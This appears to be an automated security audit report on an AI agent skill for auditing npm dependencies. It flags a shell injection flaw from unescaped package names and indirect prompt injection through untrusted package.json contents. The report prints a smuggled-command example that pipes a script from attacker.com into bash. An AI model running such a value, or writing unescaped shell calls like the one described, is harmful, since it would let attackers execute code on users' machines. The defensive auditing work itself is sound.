dependencies-audit
Fail
Audited by Gen Agent Trust Hub on Apr 23, 2026
Risk Level: HIGH
Findings: COMMAND_EXECUTION, PROMPT_INJECTION, EXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill contains a critical shell injection vulnerability in SKILL.md within the Node.js scripts in Step 2 and Step 5. The logic iterates through dependency names from a project's package.json and executes them via execSync('npm view ' + name + ...). Because the 'name' variable is taken directly from the untrusted JSON file without escaping or validation, a malicious file containing a package name with shell metacharacters (e.g., 'package; curl http://attacker.com/shell | bash') would result in arbitrary command execution.
- [PROMPT_INJECTION]: The skill is susceptible to Indirect Prompt Injection (Category 8). It ingests untrusted data from the package.json file which is then used to construct shell commands and influence the agent's decision-making process.
  - Ingestion points: package.json file contents read via Node.js scripts.
  - Boundary markers: None are present to isolate the untrusted package names from the shell execution context.
  - Capability inventory: The skill uses Shell, Write, and Read tools, enabling system-level changes.
  - Sanitization: No sanitization or escaping is performed on the input before it is used in command strings.
- [EXTERNAL_DOWNLOADS]: The skill fetches package metadata and weekly download statistics from the well-known service api.npmjs.org. This is documented as a standard operational behavior for auditing dependencies.
Recommendations
- HIGH: Downloads and executes remote code from: https://api.npmjs.org/downloads/point/last-week/ - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata